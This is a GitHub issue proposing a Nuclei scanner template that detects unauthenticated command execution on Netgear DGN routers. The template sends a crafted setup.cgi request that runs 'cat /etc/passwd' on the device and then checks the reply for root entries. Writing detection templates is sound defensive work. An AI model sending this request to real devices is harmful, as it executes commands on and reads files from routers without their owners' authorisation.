### ISSUE TITLE
netgear-dgn-unauthenticated-command-execution

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#11490]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: netgear-dgn-unauthenticated-command-execution

info:
  name: Unauthenticated Command Execution on Netgear DGN Devices
  author: 3th1c_yuk1
  severity: critical
  description: |
    This template checks for unauthenticated command execution vulnerability in Netgear DGN devices. Attackers can bypass authentication mechanisms and execute arbitrary commands with root privileges.
  reference:
    - https://www.crowdsec.net/blog/netgear-rce-and-how-vulnerabilities-persist-in-the-wild
    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md

http:
  - raw:
      - |
        GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/etc/passwd&curpath=/&currentsetting.htm=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (compatible; Nuclei)

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
```

### Relevant dumped responses

```shell

```
